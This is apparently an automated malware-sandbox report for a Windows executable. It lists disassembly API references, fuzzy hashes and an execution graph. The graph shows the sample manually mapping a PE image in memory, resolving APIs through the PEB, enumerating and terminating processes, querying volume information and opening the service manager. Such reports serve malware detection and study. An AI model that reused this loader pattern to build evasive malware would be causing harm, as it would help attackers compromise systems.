                                    • Opcode ID: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction ID: 08fdddae76046f13a4609d0da6d3235dc21c8c00c6474d33689b1c42df5d2c84
                                    • Opcode Fuzzy Hash: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction Fuzzy Hash: 2D016171941B00DBD720AF66D8067C9BBE0AF50329F20851FE499966A0CBB8A6C4CB19
                                    APIs
                                    • __getptd.LIBCMT ref: 00412B53
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412B64
                                    • __getptd.LIBCMT ref: 00412B72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: MOC$RCC$csm
                                    • API String ID: 803148776-2671469338
                                    • Opcode ID: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction ID: 0f2876ffef59d3c6b375385131f6e652370e27b5964fd21b7b7078cf082998b9
                                    • Opcode Fuzzy Hash: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction Fuzzy Hash: 9AE0ED359186088EC724AF69C18ABE933A5EB44319F1510A7A44DCB223D7ACEAE0854A
                                    APIs
                                    • __CreateFrameInfo.LIBCMT ref: 00412E0C
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106A8
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106B6
                                    • __getptd.LIBCMT ref: 00412E16
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412E24
                                    • __getptd.LIBCMT ref: 00412E32
                                    • __getptd.LIBCMT ref: 00412E3D
                                    • _CallCatchBlock2.LIBCMT ref: 00412E63
                                      • Part of subcall function 0041073F: __CallSettingFrame@12.LIBCMT ref: 0041078B
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F27
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                    • String ID:
                                    • API String ID: 1602911419-0
                                    • Opcode ID: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction ID: 7569b259fc3e624cf5a97b96a7300a54ad765ced98981fdc73afb8e83ec2d13a
                                    • Opcode Fuzzy Hash: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction Fuzzy Hash: C011E4B5D002099FDB00EFA5D986BED7BB0FF04315F10806AF854AB251DB789A919F58
                                    APIs
                                    • __getptd.LIBCMT ref: 00414EBC
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __amsg_exit.LIBCMT ref: 00414EDC
                                    • __lock.LIBCMT ref: 00414EEC
                                    • InterlockedDecrement.KERNEL32(?), ref: 00414F09
                                    • _free.LIBCMT ref: 00414F1C
                                    • InterlockedIncrement.KERNEL32(00691660), ref: 00414F34
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 3470314060-0
                                    • Opcode ID: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction ID: 34fd155b25c25adfe3620824084a2b0933ecb3f9ce2fde051769732d93a5196a
                                    • Opcode Fuzzy Hash: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction Fuzzy Hash: 6F015B79E00721ABD711EF669805BDA7760BB44725F15801BE804A7391CB6CAEC2CBDD
                                    APIs
                                    • ___BuildCatchObject.LIBCMT ref: 004131A4
                                      • Part of subcall function 004130FF: ___BuildCatchObjectHelper.LIBCMT ref: 00413135
                                    • _UnwindNestedFrames.LIBCMT ref: 004131BB
                                    • ___FrameUnwindToState.LIBCMT ref: 004131C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                    • String ID: csm$csm
                                    • API String ID: 2163707966-3733052814
                                    • Opcode ID: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction ID: 9332ba3ff9db4df31153ad81b7ccdad3367009c071c3dcb25a55caf6b99e68f4
                                    • Opcode Fuzzy Hash: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction Fuzzy Hash: 6001FB7100110ABBDF126F51CC46EEB7F6AEF08355F044016BD1855121DB7AD9F1DBA9
                                    APIs
                                    • __getptd.LIBCMT ref: 0041563D
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00415654
                                    • __amsg_exit.LIBCMT ref: 00415662
                                    • __lock.LIBCMT ref: 00415672
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00415686
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction ID: e348e55c111b0dd0511f345811d13424c8a431ddd757bbd9f2e15d6ba2996f08
                                    • Opcode Fuzzy Hash: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction Fuzzy Hash: CBF09676940B10DBD721BB7698027CD3790AF40729F54411FF5489A2D6CB6C49C1CA9D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction ID: 9f36e5016d7a42e12b889a531ce412ab75a6dd073b82eecd34aa996bae1b5947
                                    • Opcode Fuzzy Hash: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction Fuzzy Hash: CA11827111830196C734AB599852BFBB3E8EFC4358F144C3EE886C3691FA7C940983AB
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction ID: 51d71b27c4b37dd042226c9a40541835d3d141334fbcb817b22f35dada8c7e80
                                    • Opcode Fuzzy Hash: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction Fuzzy Hash: 1C01527110830196C734AB589852BFBB3E9EFC4354F044D3EF986C3681EA3C944887AB
                                    APIs
                                    • OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
                                      • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                      • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
                                    • CloseHandle.KERNEL32(00000000), ref: 0040E6FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: Process$CloseHandleOpen$TerminateToken
                                    • String ID: SYSTEM
                                    • API String ID: 1755933052-968218125
                                    • Opcode ID: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction ID: 8e2cb8a182e1328e513b3a34ec3bf5da011a535263a81edc7ae68b639948cf14
                                    • Opcode Fuzzy Hash: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction Fuzzy Hash: C2F06275A0131067D330AB16AC0DFDB3FA8DBC9B10F418529F959E3282DA38880186AA
                                    APIs
                                    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 006421F9
                                    • SetLastError.KERNEL32(0000007E), ref: 0064223B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675098007.0000000000641000.00000020.00001000.00020000.00000000.sdmp, Offset: 00641000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_641000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ErrorHugeLastRead
                                    • String ID:
                                    • API String ID: 3239643929-0
                                    • Opcode ID: 8f70519e5935eac06c7f78e709a5a75288a49e134683472820059593d6c9baf8
                                    • Instruction ID: e9da4dbffa84b53923f5f787e01a6a2f0ff7461d953b81aa30f786a96fecdebd
                                    • Opcode Fuzzy Hash: 8f70519e5935eac06c7f78e709a5a75288a49e134683472820059593d6c9baf8
                                    • Instruction Fuzzy Hash: E281AA75A0020ADFDB04CF94C894AAEBBB2FF48314F648158E909AB355C774AE81CF90
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041589E
                                    • __isleadbyte_l.LIBCMT ref: 004158D1
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00415902
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00415970
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction ID: 1bfa8a3c802f93689ab76b22000e8837c631d4e9b9b80ec41d52cc0f2dacea33
                                    • Opcode Fuzzy Hash: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction Fuzzy Hash: CE31D271A10646EFDB20EF64C880AEE3BB5FF81320F14856AE4659B2A1D334DDD0DB59
                                    APIs
                                    • _free.LIBCMT ref: 004167A8
                                      • Part of subcall function 0041025B: __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 0041025B: __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 0041025B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction ID: 3c08702fd25ada2266926da53e5058be595d777b16bfef6a83bfe969bb48a588
                                    • Opcode Fuzzy Hash: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction Fuzzy Hash: 6211EB32501611ABDB213FB5BC15ADA3794AF44378B21843BF869962A0DB3DCCC1869C
                                    APIs
                                    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00642468
                                    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 006424B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675098007.0000000000641000.00000020.00001000.00020000.00000000.sdmp, Offset: 00641000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_641000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @
                                    • API String ID: 544645111-2766056989
                                    • Opcode ID: d3fa3129027b484978ff863b366b4b4bbce316a3e8c30602411498973d95c9e0
                                    • Instruction ID: 914eacc63f0a4f9c53f25ee9263085db677f3206282910b925215860a81ac6bf
                                    • Opcode Fuzzy Hash: d3fa3129027b484978ff863b366b4b4bbce316a3e8c30602411498973d95c9e0
                                    • Instruction Fuzzy Hash: 2A21D3B4A0020AEFDB14CF98C990BADBBB6FF44304F608199E905AB340C774AF85DB55
                                    APIs
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 004106F3
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 00410703
                                    • __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: csm
                                    • API String ID: 803148776-1018135373
                                    • Opcode ID: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction ID: 69b6639a9ef3a36a169a6a5565f12a55bffb05f741e2618f410494396190d148
                                    • Opcode Fuzzy Hash: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction Fuzzy Hash: 80014B348002058FCF34DF26D6406EEB3B5AF20311F14462FE44496359DBB89AE6EF49
                                    APIs
                                    • InitCommonControlsEx.COMCTL32 ref: 0040E7BF
                                    • CreateWindowExW.USER32(00000000,SysListView32,00419450,50010201,0000000A,00000028,00000190,000001F4,?,00000000,00000000,00000000), ref: 0040E7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: CommonControlsCreateInitWindow
                                    • String ID: SysListView32
                                    • API String ID: 2646078016-78025650
                                    • Opcode ID: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction ID: f3d3e535e189fff61838196dd880c7fe0caa92239aab9ee536b101cdf5704626
                                    • Opcode Fuzzy Hash: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction Fuzzy Hash: 99E04F747843007FF6509B40DC5BF963764A788F05F50C024F649A51C0D6F46885866A

                                    Execution Graph

                                    Execution Coverage:4.3%
                                    Dynamic/Decrypted Code Coverage:76.8%
                                    Signature Coverage:5.3%
                                    Total number of Nodes:491
                                    Total number of Limit Nodes:56
                                    execution_graph 23004 40ec40 23009 40ebe0 23004->23009 23006 40ec48 23007 40ec71 VirtualAlloc 23006->23007 23008 40ec8a 23006->23008 23007->23008 23012 40e920 LoadLibraryW 23009->23012 23011 40ec09 23011->23006 23012->23011 23617 410448 72 API calls ___InternalCxxFrameHandler 23699 413948 75 API calls 6 library calls 23703 418964 CloseHandle 23043 5e9878 GetPEB FindFirstChangeNotificationW GetCurrentProcess QueryFullProcessImageNameW lstrcmpiW 23044 5e6d79 23051 5e6d80 23044->23051 23045 5e6cd0 GetPEB LoadLibraryW 23045->23051 23046 5e6daf 23048 5e6e86 LoadLibraryW 23048->23051 23049 5e3e40 GetPEB 23049->23051 23050 5e3da0 GetPEB 23050->23051 23051->23045 23051->23046 23051->23048 23051->23049 23051->23050 23052 5e3480 23051->23052 23053 5e34a3 23052->23053 23054 5e34c8 23053->23054 23062 5e3e40 GetPEB 23053->23062 23058 5e34f0 23054->23058 23064 5e3e40 GetPEB 23054->23064 23056 5e34bc 23063 5e3da0 GetPEB 23056->23063 23058->23051 23060 5e34e4 23065 5e3da0 GetPEB 23060->23065 23062->23056 23063->23054 23064->23060 23065->23058 23635 20d2630 Process32Next CloseHandle 23636 20d2430 VirtualProtect VirtualProtect 23357 5e3060 23358 5e307a 23357->23358 23359 5e326f 23358->23359 23360 5e3e40 GetPEB 23358->23360 23361 5e3215 23358->23361 23362 5e31c3 RtlAllocateHeap 23358->23362 23366 5e3da0 GetPEB 23358->23366 23359->23361 23367 5e3e40 GetPEB 23359->23367 23360->23358 23362->23358 23362->23361 23364 5e3283 23368 5e3da0 GetPEB 23364->23368 23366->23358 23367->23364 23368->23361 23642 412bb7 70 API calls 4 library calls 23645 20d1840 LoadLibraryA 23709 5e7b10 FindFirstFileW FindNextFileW FindClose GetPEB 23130 4f0000 23132 4f0005 23130->23132 23135 4f002d 23132->23135 23155 4f0456 GetPEB 23135->23155 23138 4f0456 GetPEB 23139 4f0053 23138->23139 23140 4f0456 GetPEB 23139->23140 23141 4f0061 23140->23141 23142 4f0456 GetPEB 23141->23142 23143 4f006d 23142->23143 23144 4f0456 GetPEB 23143->23144 23145 4f007b 23144->23145 23146 4f0456 GetPEB 23145->23146 23148 4f0089 23146->23148 23147 4f00e4 GetNativeSystemInfo 23149 4f0107 VirtualAlloc 23147->23149 23153 4f0029 23147->23153 23148->23147 23148->23153 23151 4f012f 23149->23151 23150 4f03b2 23157 20d27b0 23150->23157 23151->23150 23152 4f0388 VirtualProtect 23151->23152 23152->23151 23152->23153 23156 4f0045 23155->23156 23156->23138 23160 20d1000 23157->23160 23163 20d1030 LoadLibraryW GetProcAddress 23160->23163 23204 20d1b30 23163->23204 23166 20d1091 SetLastError 23200 20d102b ExitProcess 23166->23200 23167 20d10a3 23168 20d1b30 SetLastError 23167->23168 23169 20d10b9 23168->23169 23170 20d10de SetLastError 23169->23170 23171 20d10f0 23169->23171 23169->23200 23170->23200 23172 20d10ff SetLastError 23171->23172 23173 20d1111 23171->23173 23172->23200 23174 20d111c SetLastError 23173->23174 23176 20d112e GetNativeSystemInfo 23173->23176 23174->23200 23177 20d11bc 23176->23177 23178 20d11e9 23177->23178 23179 20d11d7 SetLastError 23177->23179 23207 20d1800 VirtualAlloc 23178->23207 23179->23200 23180 20d1202 23181 20d123d GetProcessHeap RtlAllocateHeap 23180->23181 23208 20d1800 VirtualAlloc 23180->23208 23182 20d127b 23181->23182 23183 20d1257 SetLastError 23181->23183 23187 20d1b30 SetLastError 23182->23187 23183->23200 23184 20d1222 23184->23181 23185 20d122e SetLastError 23184->23185 23185->23200 23188 20d12fb 23187->23188 23192 20d1302 23188->23192 23209 20d1800 VirtualAlloc 23188->23209 23189 20d1320 23210 20d1b50 23189->23210 23235 20d16c0 GetProcessHeap HeapFree VirtualFree 23192->23235 23193 20d136b 23193->23192 23216 20d21a0 23193->23216 23197 20d13ca 23197->23192 23198 20d13eb 23197->23198 23199 20d13ff GetPEB 23198->23199 23198->23200 23199->23200 23205 20d1b3b SetLastError 23204->23205 23206 20d1070 23204->23206 23205->23206 23206->23166 23206->23167 23206->23200 23207->23180 23208->23184 23209->23189 23211 20d1b7d 23210->23211 23212 20d1b30 SetLastError 23211->23212 23214 20d1be9 23211->23214 23213 20d1c32 23212->23213 23213->23214 23236 20d1800 VirtualAlloc 23213->23236 23214->23193 23217 20d21dd IsBadHugeReadPtr 23216->23217 23218 20d13b5 23216->23218 23217->23218 23220 20d2207 23217->23220 23218->23192 23229 20d1e80 23218->23229 23220->23218 23221 20d224d 23220->23221 23222 20d2239 SetLastError 23220->23222 23237 20d1a20 VirtualQuery VirtualFree VirtualAlloc 23221->23237 23222->23218 23224 20d2267 23225 20d229d 23224->23225 23226 20d2273 SetLastError 23224->23226 23225->23218 23228 20d23ae SetLastError 23225->23228 23226->23218 23228->23218 23232 20d1eba 23229->23232 23230 20d1fe5 23231 20d1d10 2 API calls 23230->23231 23234 20d1fc1 23231->23234 23232->23230 23232->23234 23238 20d1d10 23232->23238 23234->23197 23235->23200 23236->23214 23237->23224 23239 20d1d29 23238->23239 23243 20d1d1f 23238->23243 23240 20d1d37 23239->23240 23241 20d1d9d VirtualProtect 23239->23241 23240->23243 23245 20d1820 VirtualFree 23240->23245 23241->23243 23243->23232 23245->23243 23534 5e5f00 23540 5e5f13 23534->23540 23535 5e5fc5 23557 5e3580 GetPEB 23535->23557 23536 5e5fbe 23538 5e5fd1 23541 5e5ff3 23538->23541 23572 5e3e40 GetPEB 23538->23572 23540->23535 23540->23536 23570 5e3e40 GetPEB 23540->23570 23571 5e3da0 GetPEB 23540->23571 23558 5e5410 23541->23558 23546 5e5fe7 23573 5e3da0 GetPEB 23546->23573 23547 5e601f 23574 5e3e40 GetPEB 23547->23574 23548 5e6035 23553 5e605d 23548->23553 23576 5e3e40 GetPEB 23548->23576 23551 5e6029 23575 5e3da0 GetPEB 23551->23575 23555 5e6051 23577 5e3da0 GetPEB 23555->23577 23557->23538 23559 5e5426 23558->23559 23564 5e543c 23558->23564 23578 5e3e40 GetPEB 23559->23578 23561 5e5430 23579 5e3da0 GetPEB 23561->23579 23563 5e54b3 _snprintf 23563->23547 23563->23548 23564->23563 23565 5e549b GetVolumeInformationW 23564->23565 23580 5e3e40 GetPEB 23564->23580 23565->23563 23567 5e548a 23581 5e3da0 GetPEB 23567->23581 23569 5e5496 23569->23565 23570->23540 23571->23540 23572->23546 23573->23541 23574->23551 23575->23548 23576->23555 23577->23553 23578->23561 23579->23564 23580->23567 23581->23569 23717 414920 5 API calls 2 library calls 23072 5e9530 23079 5e9550 23072->23079 23073 5e9797 OpenSCManagerW 23073->23079 23074 5e3da0 GetPEB 23074->23079 23076 5e97fc 23078 5e981b 23076->23078 23086 5e3e40 GetPEB 23076->23086 23077 5e3e40 GetPEB 23077->23079 23088 5e3000 FindFirstFileW FindNextFileW FindClose GetPEB 23078->23088 23079->23073 23079->23074 23079->23076 23079->23077 23084 5e9587 23079->23084 23085 